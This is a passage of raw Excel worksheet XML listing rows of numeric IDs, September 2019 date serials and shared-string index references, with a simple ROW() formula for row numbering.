        <v>4422</v>
      </c>
      <c r="C19423" t="s">
        <v>25497</v>
      </c>
      <c r="D19423" s="1">
        <v>43735</v>
      </c>
      <c r="E19423" t="s">
        <v>31191</v>
      </c>
      <c r="F19423" t="s">
        <v>9975</v>
      </c>
      <c r="G19423" t="s">
        <v>31192</v>
      </c>
    </row>
    <row r="19424" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19424">
        <f t="shared" si="303"/>
        <v>19423</v>
      </c>
      <c r="B19424">
        <v>4423</v>
      </c>
      <c r="C19424" t="s">
        <v>25497</v>
      </c>
      <c r="D19424" s="1">
        <v>43710</v>
      </c>
      <c r="E19424" t="s">
        <v>31193</v>
      </c>
      <c r="F19424" t="s">
        <v>10021</v>
      </c>
      <c r="G19424" t="s">
        <v>31194</v>
      </c>
    </row>
    <row r="19425" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19425">
        <f t="shared" si="303"/>
        <v>19424</v>
      </c>
      <c r="B19425">
        <v>4424</v>
      </c>
      <c r="C19425" t="s">
        <v>25497</v>
      </c>
      <c r="D19425" s="1">
        <v>43719</v>
      </c>
      <c r="E19425" t="s">
        <v>31195</v>
      </c>
      <c r="F19425" t="s">
        <v>9975</v>
      </c>
      <c r="G19425" t="s">
        <v>31196</v>
      </c>
    </row>
    <row r="19426" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19426">
        <f t="shared" si="303"/>
        <v>19425</v>
      </c>
      <c r="B19426">
        <v>4425</v>
      </c>
      <c r="C19426" t="s">
        <v>25497</v>
      </c>
      <c r="D19426" s="1">
        <v>43710</v>
      </c>
      <c r="F19426" t="s">
        <v>9978</v>
      </c>
      <c r="G19426" t="s">
        <v>31197</v>
      </c>
    </row>
    <row r="19427" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19427">
        <f t="shared" si="303"/>
        <v>19426</v>
      </c>
      <c r="B19427">
        <v>4426</v>
      </c>
      <c r="C19427" t="s">
        <v>25497</v>
      </c>
      <c r="D19427" s="1">
        <v>43717</v>
      </c>
      <c r="F19427" t="s">
        <v>9975</v>
      </c>
      <c r="G19427" t="s">
        <v>31198</v>
      </c>
    </row>
    <row r="19428" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19428">
        <f t="shared" si="303"/>
        <v>19427</v>
      </c>
      <c r="B19428">
        <v>4427</v>
      </c>
      <c r="C19428" t="s">
        <v>25497</v>
      </c>
      <c r="D19428" s="1">
        <v>43728</v>
      </c>
      <c r="E19428" t="s">
        <v>31199</v>
      </c>
      <c r="F19428" t="s">
        <v>9975</v>
      </c>
      <c r="G19428" t="s">
        <v>31200</v>
      </c>
    </row>
    <row r="19429" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19429">
        <f t="shared" si="303"/>
        <v>19428</v>
      </c>
      <c r="B19429">
        <v>4428</v>
      </c>
      <c r="C19429" t="s">
        <v>25497</v>
      </c>
      <c r="D19429" s="1">
        <v>43731</v>
      </c>
      <c r="F19429" t="s">
        <v>9975</v>
      </c>
      <c r="G19429" t="s">
        <v>31201</v>
      </c>
    </row>
    <row r="19430" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19430">
        <f t="shared" si="303"/>
        <v>19429</v>
      </c>
      <c r="B19430">
        <v>4429</v>
      </c>
      <c r="C19430" t="s">
        <v>25497</v>
      </c>
      <c r="D19430" s="1">
        <v>43726</v>
      </c>
      <c r="E19430" t="s">
        <v>31202</v>
      </c>
      <c r="F19430" t="s">
        <v>10021</v>
      </c>
      <c r="G19430" t="s">
        <v>31203</v>
      </c>
    </row>
    <row r="19431" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19431">
        <f t="shared" si="303"/>
        <v>19430</v>
      </c>
      <c r="B19431">
        <v>4430</v>
      </c>
      <c r="C19431" t="s">
        <v>25497</v>
      </c>
      <c r="D19431" s="1">
        <v>43720</v>
      </c>
      <c r="F19431" t="s">
        <v>9975</v>
      </c>
      <c r="G19431" t="s">
        <v>31204</v>
      </c>
    </row>
    <row r="19432" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19432">
        <f t="shared" si="303"/>
        <v>19431</v>
      </c>
      <c r="B19432">
        <v>4431</v>
      </c>
      <c r="C19432" t="s">
        <v>25497</v>
      </c>
      <c r="D19432" s="1">
        <v>43738</v>
      </c>
      <c r="E19432" t="s">
        <v>25517</v>
      </c>
      <c r="F19432" t="s">
        <v>9975</v>
      </c>
      <c r="G19432" t="s">
        <v>31205</v>
      </c>
    </row>
    <row r="19433" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19433">
        <f t="shared" si="303"/>
        <v>19432</v>
      </c>
      <c r="B19433">
        <v>4432</v>
      </c>
      <c r="C19433" t="s">
        <v>25497</v>
      </c>
      <c r="D19433" s="1">
        <v>43736</v>
      </c>
      <c r="E19433" t="s">
        <v>31206</v>
      </c>
      <c r="F19433" t="s">
        <v>9975</v>
      </c>
      <c r="G19433" t="s">
        <v>31207</v>
      </c>
    </row>
    <row r="19434" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19434">
        <f t="shared" si="303"/>
        <v>19433</v>
      </c>
      <c r="B19434">
        <v>4433</v>
      </c>
      <c r="C19434" t="s">
        <v>25497</v>
      </c>
      <c r="D19434" s="1">
        <v>43731</v>
      </c>
      <c r="F19434" t="s">
        <v>10021</v>
      </c>
      <c r="G19434" t="s">
        <v>31208</v>
      </c>
    </row>
    <row r="19435" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19435">
        <f t="shared" si="303"/>
        <v>19434</v>
      </c>
      <c r="B19435">
        <v>4434</v>
      </c>
      <c r="C19435" t="s">
        <v>25497</v>
      </c>
      <c r="D19435" s="1">
        <v>43720</v>
      </c>
      <c r="E19435" t="s">
        <v>25592</v>
      </c>
      <c r="F19435" t="s">
        <v>9975</v>
      </c>
      <c r="G19435" t="s">
        <v>31209</v>
      </c>
    </row>
    <row r="19436" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19436">
        <f t="shared" si="303"/>
        <v>19435</v>
      </c>
      <c r="B19436">
        <v>4435</v>
      </c>
      <c r="C19436" t="s">
        <v>25497</v>
      </c>
      <c r="D19436" s="1">
        <v>43738</v>
      </c>
      <c r="F19436" t="s">
        <v>9975</v>
      </c>
      <c r="G19436" t="s">
        <v>31210</v>
      </c>
    </row>
    <row r="19437" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19437">
        <f t="shared" si="303"/>
        <v>19436</v>
      </c>
      <c r="B19437">
        <v>4436</v>
      </c>
      <c r="C19437" t="s">
        <v>25497</v>
      </c>
      <c r="D19437" s="1">
        <v>43733</v>
      </c>
      <c r="E19437" t="s">
        <v>31211</v>
      </c>
      <c r="F19437" t="s">
        <v>9975</v>
      </c>
      <c r="G19437" t="s">
        <v>31212</v>
      </c>
    </row>
    <row r="19438" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19438">
        <f t="shared" si="303"/>
        <v>19437</v>
      </c>
      <c r="B19438">
        <v>4437</v>
      </c>
      <c r="C19438" t="s">
        <v>25497</v>
      </c>
      <c r="D19438" s="1">
        <v>43712</v>
      </c>
      <c r="F19438" t="s">
        <v>9975</v>
      </c>
      <c r="G19438" t="s">
        <v>31213</v>
      </c>
    </row>
    <row r="19439" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19439">
        <f t="shared" si="303"/>
        <v>19438</v>
      </c>
      <c r="B19439">
        <v>4438</v>
      </c>
      <c r="C19439" t="s">
        <v>25497</v>
      </c>
      <c r="D19439" s="1">
        <v>43729</v>
      </c>
      <c r="E19439" t="s">
        <v>25509</v>
      </c>
      <c r="F19439" t="s">
        <v>10021</v>
      </c>
      <c r="G19439" t="s">
        <v>31214</v>
      </c>
    </row>
    <row r="19440" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19440">
        <f t="shared" si="303"/>
        <v>19439</v>
      </c>
      <c r="B19440">
        <v>4439</v>
      </c>
      <c r="C19440" t="s">
        <v>25497</v>
      </c>
      <c r="D19440" s="1">
        <v>43732</v>
      </c>
      <c r="F19440" t="s">
        <v>9975</v>
      </c>
      <c r="G19440" t="s">
        <v>31215</v>
      </c>
    </row>
    <row r="19441" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19441">
        <f t="shared" si="303"/>
        <v>19440</v>
      </c>
      <c r="B19441">
        <v>4440</v>
      </c>
      <c r="C19441" t="s">
        <v>25497</v>
      </c>
      <c r="D19441" s="1">
        <v>43719</v>
      </c>
      <c r="F19441" t="s">
        <v>9975</v>
      </c>
      <c r="G19441" t="s">
        <v>31216</v>
      </c>
    </row>
    <row r="19442" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19442">
        <f t="shared" si="303"/>
        <v>19441</v>
      </c>
      <c r="B19442">
        <v>4441</v>
      </c>
      <c r="C19442" t="s">
        <v>25497</v>
      </c>
      <c r="D19442" s="1">
        <v>43713</v>
      </c>
      <c r="E19442" t="s">
        <v>25592</v>
      </c>
      <c r="F19442" t="s">
        <v>9975</v>
      </c>
      <c r="G19442" t="s">
        <v>31217</v>
      </c>
    </row>
    <row r="19443" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19443">
        <f t="shared" si="303"/>
        <v>19442</v>
      </c>
      <c r="B19443">
        <v>4442</v>
      </c>
      <c r="C19443" t="s">
        <v>25497</v>
      </c>
      <c r="D19443" s="1">
        <v>43732</v>
      </c>
      <c r="F19443" t="s">
        <v>10021</v>
      </c>
      <c r="G19443" t="s">
        <v>31218</v>
      </c>
    </row>
    <row r="19444" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19444">
        <f t="shared" si="303"/>
        <v>19443</v>
      </c>
      <c r="B19444">
        <v>4443</v>
      </c>
      <c r="C19444" t="s">
        <v>25497</v>
      </c>
      <c r="D19444" s="1">
        <v>43732</v>
      </c>
      <c r="E19444" t="s">
        <v>25707</v>
      </c>
      <c r="F19444" t="s">
        <v>9978</v>
      </c>
      <c r="G19444" t="s">
        <v>31219</v>
      </c>
    </row>
    <row r="19445" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19445">
        <f t="shared" si="303"/>
        <v>19444</v>
      </c>
      <c r="B19445">
        <v>4444</v>
      </c>
      <c r="C19445" t="s">
        <v>25497</v>
      </c>
      <c r="D19445" s="1">
        <v>43736</v>
      </c>
      <c r="E19445" t="s">
        <v>31220</v>
      </c>
      <c r="F19445" t="s">
        <v>9975</v>
      </c>
      <c r="G19445" t="s">
        <v>31221</v>
      </c>
    </row>
    <row r="19446" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19446">
        <f t="shared" si="303"/>
        <v>19445</v>
      </c>
      <c r="B19446">
        <v>4445</v>
      </c>
      <c r="C19446" t="s">
        <v>25497</v>
      </c>
      <c r="D19446" s="1">
        <v>43713</v>
      </c>
      <c r="E19446" t="s">
        <v>31222</v>
      </c>
      <c r="F19446" t="s">
        <v>10021</v>
      </c>
      <c r="G19446" t="s">
        <v>31223</v>
      </c>
    </row>
    <row r="19447" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19447">
        <f t="shared" si="303"/>
        <v>19446</v>
      </c>
      <c r="B19447">
        <v>4446</v>
      </c>
      <c r="C19447" t="s">
        <v>25497</v>
      </c>
      <c r="D19447" s="1">
        <v>43724</v>
      </c>
      <c r="F19447" t="s">
        <v>9975</v>
      </c>
      <c r="G19447" t="s">
        <v>31224</v>
      </c>
    </row>
    <row r="19448" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19448">
        <f t="shared" si="303"/>
        <v>19447</v>
      </c>
      <c r="B19448">
        <v>4447</v>
      </c>
      <c r="C19448" t="s">
        <v>25497</v>
      </c>
      <c r="D19448" s="1">
        <v>43731</v>
      </c>
      <c r="E19448" t="s">
        <v>25517</v>
      </c>
      <c r="F19448" t="s">
        <v>9975</v>
      </c>
      <c r="G19448" t="s">
        <v>31225</v>
      </c>
    </row>
    <row r="19449" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19449">
        <f t="shared" si="303"/>
        <v>19448</v>
      </c>
      <c r="B19449">
        <v>4448</v>
      </c>
      <c r="C19449" t="s">
        <v>25497</v>
      </c>
      <c r="D19449" s="1">
        <v>43732</v>
      </c>
      <c r="E19449" t="s">
        <v>25592</v>
      </c>
      <c r="F19449" t="s">
        <v>9975</v>
      </c>
      <c r="G19449" t="s">
        <v>31226</v>
      </c>
    </row>
    <row r="19450" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19450">
        <f t="shared" si="303"/>
        <v>19449</v>
      </c>
      <c r="B19450">
        <v>4449</v>
      </c>
      <c r="C19450" t="s">
        <v>25497</v>
      </c>
      <c r="D19450" s="1">
        <v>43731</v>
      </c>
      <c r="F19450" t="s">
        <v>9978</v>
      </c>
      <c r="G19450" t="s">
        <v>31227</v>
      </c>
    </row>
    <row r="19451" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19451">
        <f t="shared" si="303"/>
        <v>19450</v>
      </c>
      <c r="B19451">
        <v>4450</v>
      </c>
      <c r="C19451" t="s">
        <v>25497</v>
      </c>
      <c r="D19451" s="1">
        <v>43717</v>
      </c>
      <c r="E19451" t="s">
        <v>31228</v>
      </c>
      <c r="F19451" t="s">
        <v>9978</v>
      </c>
      <c r="G19451" t="s">
        <v>31229</v>
      </c>
    </row>
    <row r="19452" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19452">
        <f t="shared" si="303"/>
        <v>19451</v>
      </c>
      <c r="B19452">
        <v>4451</v>
      </c>
      <c r="C19452" t="s">
        <v>25497</v>
      </c>
      <c r="D19452" s="1">
        <v>43736</v>
      </c>
      <c r="E19452" t="s">
        <v>28421</v>
      </c>
      <c r="F19452" t="s">
        <v>9975</v>
      </c>
      <c r="G19452" t="s">
        <v>31230</v>
      </c>
    </row>
    <row r="19453" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19453">
        <f t="shared" si="303"/>
        <v>19452</v>
      </c>
      <c r="B19453">
        <v>4452</v>
      </c>
      <c r="C19453" t="s">
        <v>25497</v>
      </c>
      <c r="D19453" s="1">
        <v>43711</v>
      </c>
      <c r="E19453" t="s">
        <v>27466</v>
      </c>
      <c r="F19453" t="s">
        <v>9975</v>
      </c>
      <c r="G19453" t="s">
        <v>31231</v>
      </c>
    </row>
    <row r="19454" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19454">
        <f t="shared" si="303"/>
        <v>19453</v>
      </c>
      <c r="B19454">
        <v>4453</v>
      </c>
      <c r="C19454" t="s">
        <v>25497</v>
      </c>
      <c r="D19454" s="1">
        <v>43709</v>
      </c>
      <c r="E19454" t="s">
        <v>25517</v>
      </c>
      <c r="F19454" t="s">
        <v>9975</v>
      </c>
      <c r="G19454" t="s">
        <v>31232</v>
      </c>
    </row>
    <row r="19455" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19455">
        <f t="shared" si="303"/>
        <v>19454</v>
      </c>
      <c r="B19455">
        <v>4454</v>
      </c>
      <c r="C19455" t="s">
        <v>25497</v>
      </c>
      <c r="D19455" s="1">
        <v>43726</v>
      </c>
      <c r="E19455" t="s">
        <v>31233</v>
      </c>
      <c r="F19455" t="s">
        <v>10021</v>
      </c>
      <c r="G19455" t="s">
        <v>31234</v>
      </c>
    </row>
    <row r="19456" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19456">
        <f t="shared" si="303"/>
        <v>19455</v>
      </c>
      <c r="B19456">
        <v>4455</v>
      </c>
      <c r="C19456" t="s">
        <v>25497</v>
      </c>
      <c r="D19456" s="1">
        <v>43709</v>
      </c>
      <c r="E19456" t="s">
        <v>31235</v>
      </c>
      <c r="F19456" t="s">
        <v>10526</v>
      </c>
      <c r="G19456" t="s">
        <v>31236</v>
      </c>
    </row>
    <row r="19457" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19457">
        <f t="shared" si="303"/>
        <v>19456</v>
      </c>
      <c r="B19457">
        <v>4456</v>
      </c>
      <c r="C19457" t="s">
        <v>25497</v>
      </c>
      <c r="D19457" s="1">
        <v>43725</v>
      </c>
      <c r="F19457" t="s">
        <v>9975</v>
      </c>
      <c r="G19457" t="s">
        <v>31237</v>
      </c>
    </row>
    <row r="19458" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19458">
        <f t="shared" si="303"/>
        <v>19457</v>
      </c>
      <c r="B19458">
        <v>4457</v>
      </c>
      <c r="C19458" t="s">
        <v>25497</v>
      </c>
      <c r="D19458" s="1">
        <v>43725</v>
      </c>
      <c r="E19458" t="s">
        <v>31238</v>
      </c>
      <c r="F19458" t="s">
        <v>9975</v>
      </c>
      <c r="G19458" t="s">
        <v>31239</v>
      </c>
    </row>
    <row r="19459" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19459">
        <f t="shared" ref="A19459:A19522" si="304">+ROW(A19458)</f>
        <v>19458</v>
      </c>
      <c r="B19459">
        <v>4458</v>
      </c>
      <c r="C19459" t="s">
        <v>25497</v>
      </c>
      <c r="D19459" s="1">
        <v>43714</v>
      </c>
      <c r="E19459" t="s">
        <v>31240</v>
      </c>
      <c r="F19459" t="s">
        <v>9975</v>
      </c>
      <c r="G19459" t="s">
        <v>31241</v>
      </c>
    </row>
    <row r="19460" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19460">
        <f t="shared" si="304"/>
        <v>19459</v>
      </c>
      <c r="B19460">
        <v>4459</v>
      </c>
      <c r="C19460" t="s">
        <v>25497</v>
      </c>
      <c r="D19460" s="1">
        <v>43729</v>
      </c>
      <c r="E19460" t="s">
        <v>25504</v>
      </c>
      <c r="F19460" t="s">
        <v>9975</v>
      </c>
      <c r="G19460" t="s">
        <v>31242</v>
      </c>
    </row>
    <row r="19461" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19461">
        <f t="shared" si="304"/>
        <v>19460</v>
      </c>
      <c r="B19461">
        <v>4460</v>
      </c>
      <c r="C19461" t="s">
        <v>25497</v>
      </c>
      <c r="D19461" s="1">
        <v>43730</v>
      </c>
      <c r="F19461" t="s">
        <v>9975</v>
      </c>
      <c r="G19461" t="s">
        <v>31243</v>
      </c>
    </row>
    <row r="19462" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19462">
        <f t="shared" si="304"/>
        <v>19461</v>
      </c>
      <c r="B19462">
        <v>4461</v>
      </c>
      <c r="C19462" t="s">
        <v>25497</v>
      </c>
      <c r="D19462" s="1">
        <v>43716</v>
      </c>
      <c r="E19462" t="s">
        <v>30704</v>
      </c>
      <c r="F19462" t="s">
        <v>10526</v>
      </c>
      <c r="G19462" t="s">
        <v>31244</v>
      </c>
    </row>
    <row r="19463" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19463">
        <f t="shared" si="304"/>
        <v>19462</v>
      </c>
      <c r="B19463">
        <v>4462</v>
      </c>
      <c r="C19463" t="s">
        <v>25497</v>
      </c>
      <c r="D19463" s="1">
        <v>43722</v>
      </c>
      <c r="E19463" t="s">
        <v>25517</v>
      </c>
      <c r="F19463" t="s">
        <v>9975</v>
      </c>
      <c r="G19463" t="s">
        <v>31245</v>
      </c>
    </row>
    <row r="19464" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19464">
        <f t="shared" si="304"/>
        <v>19463</v>
      </c>
      <c r="B19464">
        <v>4463</v>
      </c>
      <c r="C19464" t="s">
        <v>25497</v>
      </c>
      <c r="D19464" s="1">
        <v>43732</v>
      </c>
      <c r="F19464" t="s">
        <v>9975</v>
      </c>
      <c r="G19464" t="s">
        <v>31246</v>
      </c>
    </row>
    <row r="19465" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19465">
        <f t="shared" si="304"/>
        <v>19464</v>
      </c>
      <c r="B19465">
        <v>4464</v>
      </c>
      <c r="C19465" t="s">
        <v>25497</v>
      </c>
      <c r="D19465" s="1">
        <v>43718</v>
      </c>
      <c r="E19465" t="s">
        <v>31247</v>
      </c>
      <c r="F19465" t="s">
        <v>9975</v>
      </c>
      <c r="G19465" t="s">
        <v>31248</v>
      </c>
    </row>
    <row r="19466" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19466">
        <f t="shared" si="304"/>
        <v>19465</v>
      </c>
      <c r="B19466">
        <v>4465</v>
      </c>
      <c r="C19466" t="s">
        <v>25497</v>
      </c>
      <c r="D19466" s="1">
        <v>43734</v>
      </c>
      <c r="E19466" t="s">
        <v>25517</v>
      </c>
      <c r="F19466" t="s">
        <v>9975</v>
      </c>
      <c r="G19466" t="s">
        <v>31249</v>
      </c>
    </row>
    <row r="19467" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19467">
        <f t="shared" si="304"/>
        <v>19466</v>
      </c>
      <c r="B19467">
        <v>4466</v>
      </c>
      <c r="C19467" t="s">
        <v>25497</v>
      </c>
      <c r="D19467" s="1">
        <v>43714</v>
      </c>
      <c r="E19467" t="s">
        <v>25592</v>
      </c>
      <c r="F19467" t="s">
        <v>9975</v>
      </c>
      <c r="G19467" t="s">
        <v>31250</v>
      </c>
    </row>
    <row r="19468" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19468">
        <f t="shared" si="304"/>
        <v>19467</v>
      </c>
      <c r="B19468">
        <v>4467</v>
      </c>
      <c r="C19468" t="s">
        <v>25497</v>
      </c>
      <c r="D19468" s="1">
        <v>43728</v>
      </c>
      <c r="F19468" t="s">
        <v>9975</v>
      </c>
      <c r="G19468" t="s">
        <v>31251</v>
      </c>
    </row>
    <row r="19469" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19469">
        <f t="shared" si="304"/>
        <v>19468</v>
      </c>
      <c r="B19469">
        <v>4468</v>
      </c>
      <c r="C19469" t="s">
        <v>25497</v>
      </c>
      <c r="D19469" s="1">
        <v>43720</v>
      </c>
      <c r="F19469" t="s">
        <v>9975</v>
      </c>
      <c r="G19469" t="s">
        <v>31252</v>
      </c>
    </row>
    <row r="19470" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19470">
        <f t="shared" si="304"/>
        <v>19469</v>
      </c>
      <c r="B19470">
        <v>4469</v>
      </c>
      <c r="C19470" t="s">
        <v>25497</v>
      </c>
      <c r="D19470" s="1">
        <v>43727</v>
      </c>
      <c r="E19470" t="s">
        <v>25592</v>
      </c>
      <c r="F19470" t="s">
        <v>9975</v>
      </c>
      <c r="G19470" t="s">
        <v>31253</v>
      </c>
    </row>
    <row r="19471" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19471">
        <f t="shared" si="304"/>
        <v>19470</v>
      </c>
      <c r="B19471">
        <v>4470</v>
      </c>
      <c r="C19471" t="s">
        <v>25497</v>
      </c>
      <c r="D19471" s="1">
        <v>43718</v>
      </c>
      <c r="E19471" t="s">
        <v>31254</v>
      </c>
      <c r="F19471" t="s">
        <v>9975</v>
      </c>
      <c r="G19471" t="s">
        <v>31255</v>
      </c>
    </row>
    <row r="19472" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19472">
        <f t="shared" si="304"/>
        <v>19471</v>
      </c>
      <c r="B19472">
        <v>4471</v>
      </c>
      <c r="C19472" t="s">
        <v>25497</v>
      </c>
      <c r="D19472" s="1">
        <v>43734</v>
      </c>
      <c r="E19472" t="s">
        <v>25609</v>
      </c>
      <c r="F19472" t="s">
        <v>9975</v>
      </c>
      <c r="G19472" t="s">
        <v>31256</v>
      </c>
    </row>
    <row r="19473" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19473">
        <f t="shared" si="304"/>
        <v>19472</v>
      </c>
      <c r="B19473">
        <v>4472</v>
      </c>
      <c r="C19473" t="s">
        <v>25497</v>
      </c>
      <c r="D19473" s="1">
        <v>43728</v>
      </c>
      <c r="F19473" t="s">
        <v>9975</v>
      </c>
      <c r="G19473" t="s">
        <v>31257</v>
      </c>
    </row>
    <row r="19474" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19474">
        <f t="shared" si="304"/>
        <v>19473</v>
      </c>
      <c r="B19474">
        <v>4473</v>
      </c>
      <c r="C19474" t="s">
        <v>25497</v>
      </c>
      <c r="D19474" s="1">
        <v>43732</v>
      </c>
      <c r="E19474" t="s">
        <v>25512</v>
      </c>
      <c r="F19474" t="s">
        <v>9975</v>
      </c>
      <c r="G19474" t="s">
        <v>31258</v>
      </c>
    </row>
    <row r="19475" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19475">
        <f t="shared" si="304"/>
        <v>19474</v>
      </c>
      <c r="B19475">
        <v>4474</v>
      </c>
      <c r="C19475" t="s">
        <v>25497</v>
      </c>
      <c r="D19475" s="1">
        <v>43725</v>
      </c>
      <c r="F19475" t="s">
        <v>9975</v>
      </c>
      <c r="G19475" t="s">
        <v>31259</v>
      </c>
    </row>
    <row r="19476" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19476">
        <f t="shared" si="304"/>
        <v>19475</v>
      </c>
      <c r="B19476">
        <v>4475</v>
      </c>
      <c r="C19476" t="s">
        <v>25497</v>
      </c>
      <c r="D19476" s="1">
        <v>43720</v>
      </c>
      <c r="F19476" t="s">
        <v>9975</v>
      </c>
      <c r="G19476" t="s">
        <v>31260</v>
      </c>
    </row>
    <row r="19477" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19477">
        <f t="shared" si="304"/>
        <v>19476</v>
      </c>
      <c r="B19477">
        <v>4476</v>
      </c>
      <c r="C19477" t="s">
        <v>25497</v>
      </c>
      <c r="D19477" s="1">
        <v>43715</v>
      </c>
      <c r="E19477" t="s">
        <v>31261</v>
      </c>
      <c r="F19477" t="s">
        <v>10526</v>
      </c>
      <c r="G19477" t="s">
        <v>31262</v>
      </c>
    </row>
    <row r="19478" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19478">
        <f t="shared" si="304"/>
        <v>19477</v>
      </c>
      <c r="B19478">
        <v>4477</v>
      </c>
      <c r="C19478" t="s">
        <v>25497</v>
      </c>
      <c r="D19478" s="1">
        <v>43713</v>
      </c>
      <c r="E19478" t="s">
        <v>31263</v>
      </c>
      <c r="F19478" t="s">
        <v>9975</v>
      </c>
      <c r="G19478" t="s">
        <v>31264</v>
      </c>
    </row>
    <row r="19479" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19479">
        <f t="shared" si="304"/>
        <v>19478</v>
      </c>
      <c r="B19479">
        <v>4478</v>
      </c>
      <c r="C19479" t="s">
        <v>25497</v>
      </c>
      <c r="D19479" s="1">
        <v>43732</v>
      </c>
      <c r="F19479" t="s">
        <v>9975</v>
      </c>
      <c r="G19479" t="s">
        <v>31265</v>
      </c>
    </row>
    <row r="19480" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19480">
        <f t="shared" si="304"/>
        <v>19479</v>
      </c>
      <c r="B19480">
        <v>4479</v>
      </c>
      <c r="C19480" t="s">
        <v>25497</v>
      </c>
      <c r="D19480" s="1">
        <v>43729</v>
      </c>
      <c r="E19480" t="s">
        <v>29743</v>
      </c>
      <c r="F19480" t="s">
        <v>9975</v>
      </c>
      <c r="G19480" t="s">
        <v>31266</v>
      </c>
    </row>
    <row r="19481" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19481">
        <f t="shared" si="304"/>
        <v>19480</v>
      </c>
      <c r="B19481">
        <v>4480</v>
      </c>
      <c r="C19481" t="s">
        <v>25497</v>
      </c>
      <c r="D19481" s="1">
        <v>43734</v>
      </c>
      <c r="F19481" t="s">
        <v>9975</v>
      </c>
      <c r="G19481" t="s">
        <v>31267</v>
      </c>
    </row>
    <row r="19482" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19482">
        <f t="shared" si="304"/>
        <v>19481</v>
      </c>
      <c r="B19482">
        <v>4481</v>
      </c>
      <c r="C19482" t="s">
        <v>25497</v>
      </c>
      <c r="D19482" s="1">
        <v>43718</v>
      </c>
      <c r="E19482" t="s">
        <v>31268</v>
      </c>
      <c r="F19482" t="s">
        <v>9975</v>
      </c>
      <c r="G19482" t="s">
        <v>31269</v>
      </c>
    </row>
    <row r="19483" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19483">
        <f t="shared" si="304"/>
        <v>19482</v>
      </c>
      <c r="B19483">
        <v>4482</v>
      </c>
      <c r="C19483" t="s">
        <v>25497</v>
      </c>
      <c r="D19483" s="1">
        <v>43711</v>
      </c>
      <c r="E19483" t="s">
        <v>25509</v>
      </c>
      <c r="F19483" t="s">
        <v>10021</v>
      </c>
      <c r="G19483" t="s">
        <v>31270</v>
      </c>
    </row>
    <row r="19484" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19484">
        <f t="shared" si="304"/>
        <v>19483</v>
      </c>
      <c r="B19484">
        <v>4483</v>
      </c>
      <c r="C19484" t="s">
        <v>25497</v>
      </c>
      <c r="D19484" s="1">
        <v>43713</v>
      </c>
      <c r="E19484" t="s">
        <v>31271</v>
      </c>
      <c r="F19484" t="s">
        <v>9975</v>
      </c>
      <c r="G19484" t="s">
        <v>31272</v>
      </c>
    </row>
    <row r="19485" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19485">
        <f t="shared" si="304"/>
        <v>19484</v>
      </c>
      <c r="B19485">
        <v>4484</v>
      </c>
      <c r="C19485" t="s">
        <v>25497</v>
      </c>
      <c r="D19485" s="1">
        <v>43713</v>
      </c>
      <c r="F19485" t="s">
        <v>10021</v>
      </c>
      <c r="G19485" t="s">
        <v>31273</v>
      </c>
    </row>
    <row r="19486" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A19486">
        <f t="shared" si="304"/>
        <v>19485</v>
      </c>
      <c r="B19486">
        <v>4485</v>
      </c>
      <c r="C19486" t="s">
        <v>25497</v>
      </c>
      <c r="D19486" s="1">
        <v>43720</v>
      </c>
      <c r="F19486" t="s">
        <v>9975</v>
      </c>
      <c r="G19486" t="s">
        <v>31274</v>
      </c>
    </row>
